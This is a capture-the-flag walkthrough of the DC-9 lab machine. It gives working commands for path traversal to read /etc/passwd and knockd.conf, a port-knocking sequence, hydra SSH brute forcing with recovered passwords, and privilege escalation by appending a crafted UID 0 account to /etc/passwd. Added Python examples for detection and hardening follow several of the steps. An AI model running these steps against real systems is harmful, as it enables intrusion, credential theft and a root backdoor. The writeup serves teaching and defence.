DC-9

1. File inclusion:

http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd

  

2. Port-knocking service:

http://192.168.178.135/manage.php?file=../../../../../../../../../etc/knockd.conf
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

Checking the state of port 22 before and after knocking:
nmap -p 22,80 192.168.178.135
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http

nc -nv 192.168.178.135 7469
nc -nv 192.168.178.135 8475
nc -nv 192.168.178.135 9842

or:
nmap -p 7469 192.168.178.135
nmap -p 8475 192.168.178.135
nmap -p 9842 192.168.178.135

nmap -p 22,80 192.168.178.135
PORT STATE SERVICE
22/tcp open ssh   // now open
80/tcp open http
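To see why exactly those three SYNs, in that order and inside 25 seconds, flip port 22 from filtered to open, here is an added example (not code from the DC-9 box or from knockd itself). It parses the knockd.conf read above and replays constructed connection events through a simplified model of knockd's matching rules: one in-progress attempt per source address and rule, a wrong port or an expired seq_timeout resets it, and a completed sequence yields the iptables command with %IP% filled in. The event list and the 192.168.178.x addresses in it are made up for the demonstration.

```python
import re

# The config text is the knockd.conf shown above, pasted unchanged.
KNOCKD_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""

# Constructed SYN arrivals as (unix_time, src_ip, dst_port).  The first host
# knocks correctly; the second starts but lets seq_timeout expire.
EVENTS = [
    (100.0, "192.168.178.1", 7469),
    (101.0, "192.168.178.1", 8475),
    (102.0, "192.168.178.1", 9842),
    (200.0, "192.168.178.50", 7469),
    (230.0, "192.168.178.50", 8475),
    (231.0, "192.168.178.50", 9842),
]


def parse_knockd(text):
    """Return {section: {key: value}}; bare words such as UseSyslog map to True."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1)
            sections[current] = {}
        elif current is None:
            continue                      # text before the first section
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            sections[current][key] = value
        else:
            sections[current][line] = True
    return sections


def matched_knocks(events, conf):
    """Walk time-ordered events; return (src_ip, rule, expanded command) for
    every completed knock sequence (simplified knockd semantics, see above)."""
    rules = {}
    for name, opts in conf.items():
        if "sequence" in opts:
            ports = [int(p) for p in opts["sequence"].split(",")]
            rules[name] = (ports, float(opts.get("seq_timeout", 25)), opts.get("command", ""))
    progress = {}   # (ip, rule) -> (index of next expected port, time of first knock)
    hits = []
    for ts, ip, port in events:
        for name, (ports, timeout, command) in rules.items():
            idx, started = progress.get((ip, name), (0, None))
            if idx and ts - started > timeout:
                idx, started = 0, None    # too slow: the attempt is forgotten
            if port == ports[idx]:
                if idx == 0:
                    started = ts
                idx += 1
                if idx == len(ports):     # sequence complete: knockd would run this
                    hits.append((ip, name, command.replace("%IP%", ip)))
                    idx, started = 0, None
            else:
                idx, started = 0, None    # wrong port: start over
            progress[(ip, name)] = (idx, started)
    return hits


if __name__ == "__main__":
    for ip, rule, command in matched_knocks(EVENTS, parse_knockd(KNOCKD_CONF)):
        print(f"{ip} completed [{rule}] -> {command}")
```

Running it reports only 192.168.178.1 completing openSSH; the second host's sequence dies at the 30-second gap. The same model also explains the author's nmap alternative: any single source that hits 7469, 8475 and 9842 in ascending order within 25 seconds, a port scan included, satisfies the rule, which is the limit of what port knocking buys as an access control.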

3. Brute-forcing the SSH username and password with hydra:

hydra -L user-dict -P pass-dict 192.168.178.135 ssh
or: hydra -L user-dict -P pass-dict ssh://192.168.178.135

[22][ssh] host: 192.168.178.135 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.178.135 login: janitor password: Ilovepeepee
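From the other side of the wire, a hydra run like this leaves a dense burst of "Failed password" lines in sshd's auth log, usually followed by one "Accepted password" for the account that fell. The following is an added example (not from the writeup) of the detection logic a defender would run over that log: it parses sshd auth lines, counts failures per source address inside a sliding window, and reports which of the flagged sources later logged in successfully. The log lines are constructed for the demonstration, reusing the account names from this box; the window and threshold are assumed defaults.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in sshd's auth.log format (not captured from the target).
AUTH_LOG = """\
Aug 18 00:41:01 dc-9 sshd[1201]: Failed password for invalid user admin from 192.168.178.1 port 50111 ssh2
Aug 18 00:41:01 dc-9 sshd[1203]: Failed password for invalid user test from 192.168.178.1 port 50112 ssh2
Aug 18 00:41:02 dc-9 sshd[1205]: Failed password for joeyt from 192.168.178.1 port 50113 ssh2
Aug 18 00:41:02 dc-9 sshd[1207]: Failed password for janitor from 192.168.178.1 port 50114 ssh2
Aug 18 00:41:03 dc-9 sshd[1209]: Failed password for fredf from 192.168.178.1 port 50115 ssh2
Aug 18 00:41:03 dc-9 sshd[1211]: Accepted password for janitor from 192.168.178.1 port 50116 ssh2
Aug 18 00:45:10 dc-9 sshd[1300]: Failed password for fredf from 192.168.178.77 port 40001 ssh2
Aug 18 00:50:10 dc-9 sshd[1302]: Accepted password for fredf from 192.168.178.77 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_auth(text, year=2022):
    """Return (timestamp, src_ip, user, accepted) tuples for matching lines.
    Syslog timestamps carry no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def find_bruteforce(events, window_s=60, threshold=5):
    """Flag every source IP with at least `threshold` failures inside any
    `window_s`-second span; record the usernames tried and any account that
    was accepted from that IP after the burst began."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [ts for ts, _, ok in evs if not ok]
        users = sorted({u for _, u, ok in evs if not ok})
        for i in range(len(fails)):
            j = i
            while j < len(fails) and (fails[j] - fails[i]).total_seconds() <= window_s:
                j += 1
            if j - i >= threshold:
                accepted = sorted({u for ts, u, ok in evs if ok and ts >= fails[i]})
                alerts[ip] = {"failures": j - i, "users_tried": users, "accepted_after": accepted}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_auth(AUTH_LOG)).items():
        print(f"{ip}: {info['failures']} failures, tried {info['users_tried']}, "
              f"then accepted {info['accepted_after'] or 'nobody'}")
```

On the sample the single-failure host 192.168.178.77 stays quiet while 192.168.178.1 is flagged with five failures in two seconds and a subsequent successful login as janitor, which is the signal worth paging on: a password guess that worked.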

SSH login

ssh janitor@192.168.178.135

ls -a   // reveals the hidden directory .secrets-for-putin/ containing passwords-found-on-post-it-notes.txt
Opening it reveals a password list:
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Add these to pass-dict and run the brute force again:
hydra -L user-dict -P pass-dict 192.168.178.135 ssh
This turns up another user (log in):
ssh fredf@192.168.142.139   // password: B4-Tru3-001
sudo -l
This shows that the test script can be run as root without a password:
cd /opt/devstuff/dist/test/
./test
Usage: python test.py read append

find / -name test.py 2>/dev/null      // finds the file /opt/devstuff/test.py

 

fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py

#!/usr/bin/python

import sys

# Expects exactly two arguments: a file to read and a file to append to.
if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    # Read the whole source file ...
    f = open(sys.argv[1], "r")
    output = (f.read())

    # ... and append it to the destination file.  Neither path is checked,
    # and the sudo rule runs this as root.
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

  

// Analysis: the script appends the contents of one file to another.
So what can we do with it? Since it runs as root, we can craft an entry for a new user with root privileges and use test.py to append that entry to /etc/passwd.
Let's do it!
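Both holes in this writeup have the same shape: a path supplied by an untrusted caller is used unchanged by code running with more privilege than the caller. welcome.php takes its file= parameter straight to the filesystem, and test.py does the same with both of its arguments while sudo runs it as root. The following is an added example (not code from the DC-9 box, and not a fix shipped by anyone) of the check both should have made: resolve the requested name inside one allowed directory and refuse anything that lands outside it. safe_append() is what a hardened test.py would look like on top of that check. The directory names and the demo() scratch files are assumptions for the demonstration.

```python
import os
import tempfile


def confine_path(base_dir, requested):
    """Resolve `requested` relative to `base_dir` and return the real absolute
    path, or None if it would land outside base_dir (via ../, an absolute
    path, or a symlink that points elsewhere).  Nothing is opened here."""
    if not requested or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # join() discards base when `requested` is absolute, so realpath of the join
    # handles "/etc/passwd" and "../../../etc/passwd" the same way.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_append(src, dst, allowed_dir):
    """What test.py should have done: only move data between files inside
    allowed_dir.  Returns True if the append happened, False if rejected."""
    src_path = confine_path(allowed_dir, src)
    dst_path = confine_path(allowed_dir, dst)
    if src_path is None or dst_path is None or src_path == dst_path:
        return False
    with open(src_path, "r") as f_in:
        data = f_in.read()
    with open(dst_path, "a") as f_out:
        f_out.write(data)
    return True


def demo():
    """Exercise safe_append in a scratch directory (assumed layout).
    Returns (inside_allowed, outside_rejected, contents_of_log)."""
    with tempfile.TemporaryDirectory() as work:
        with open(os.path.join(work, "notes.txt"), "w") as f:
            f.write("hello\n")
        inside = safe_append("notes.txt", "log.txt", work)
        # The traversal the writeup uses against welcome.php, and the
        # /etc/passwd destination used against test.py, are both refused.
        outside = safe_append("notes.txt", "../../../../../../etc/passwd", work)
        with open(os.path.join(work, "log.txt")) as f:
            content = f.read()
    return inside, outside, content


if __name__ == "__main__":
    print(confine_path("/var/www/html", "../../../../../../../../../etc/passwd"))
    print(confine_path("/var/www/html", "welcome.html"))
    print(demo())
```

The realpath step matters more than the `..` filtering people usually reach for: it also catches a symlink planted inside the allowed directory that points at /etc/passwd, which a string check on the request would wave through. Even with this check, a sudo rule that hands a lower-privileged user a root-owned file-copy primitive is a risky grant, and the usual fix is to drop the rule rather than harden the script.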


4. First create a password hash for the new local user with openssl

openssl passwd -1 -salt admin 123456
// -1 selects the MD5-based crypt algorithm
// -salt sets the salt mixed into the hash (here admin; openssl picks a random one when it is omitted)

 

$1$admin$LClYcRe.ee8dQwgrFc5nz.

 

5. Privilege escalation

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test/
sudo ./test /tmp/passwd /etc/passwd   // appends the UID 0 user to /etc/passwd
su admin   // password: 123456
whoami
cd /root
ls -a
cat theflag.txt
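The persistence this leaves behind is easy to spot if anyone looks: a second UID 0 account, a password hash sitting in /etc/passwd instead of /etc/shadow, and a duplicate UID. As an added example (not from the writeup), here is the audit a defender would run over /etc/passwd to catch exactly that. The file excerpt is constructed; its last line is the entry appended above.

```python
# Constructed /etc/passwd excerpt; the final line is the entry added in step 5.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
fredf:x:1001:1001::/home/fredf:/bin/bash
janitor:x:1002:1002::/home/janitor:/bin/bash
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash
"""


def parse_passwd(text):
    """Split passwd(5) lines into dicts; entries without 7 fields are kept
    and marked malformed so the audit can report them."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": n, "name": line, "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": n, "name": name, "passwd": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell, "malformed": False})
    return entries


def audit_passwd(text):
    """Return (line, account, finding) for every suspicious entry."""
    findings = []
    uid_owner = {}
    for e in parse_passwd(text):
        where = (e["line"], e["name"])
        if e["malformed"]:
            findings.append(where + ("malformed entry, expected 7 colon-separated fields",))
            continue
        if not e["uid"].isdigit():
            findings.append(where + ("non-numeric UID",))
            continue
        uid = int(e["uid"])
        if uid == 0 and e["name"] != "root":
            findings.append(where + ("UID 0 account other than root",))
        if uid in uid_owner:
            findings.append(where + (f"duplicate UID {uid}, already used by {uid_owner[uid]}",))
        else:
            uid_owner[uid] = e["name"]
        pw = e["passwd"]
        if pw == "":
            findings.append(where + ("empty password field, login needs no password",))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # "x" means the hash lives in /etc/shadow; "*" and "!..." are locked.
            # Anything else is a hash readable by every local user.
            findings.append(where + ("password hash kept in /etc/passwd instead of /etc/shadow",))
    return findings


if __name__ == "__main__":
    for line, account, finding in audit_passwd(PASSWD):
        print(f"line {line} ({account}): {finding}")
```

On the sample every finding points at line 6. A hash in the second field is also a cracking target for any local user, since /etc/passwd is world-readable, which is one more reason shadowed passwords and a file-integrity check on /etc/passwd are standard.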

 

Posted 2022-08-18 01:15 by boomohg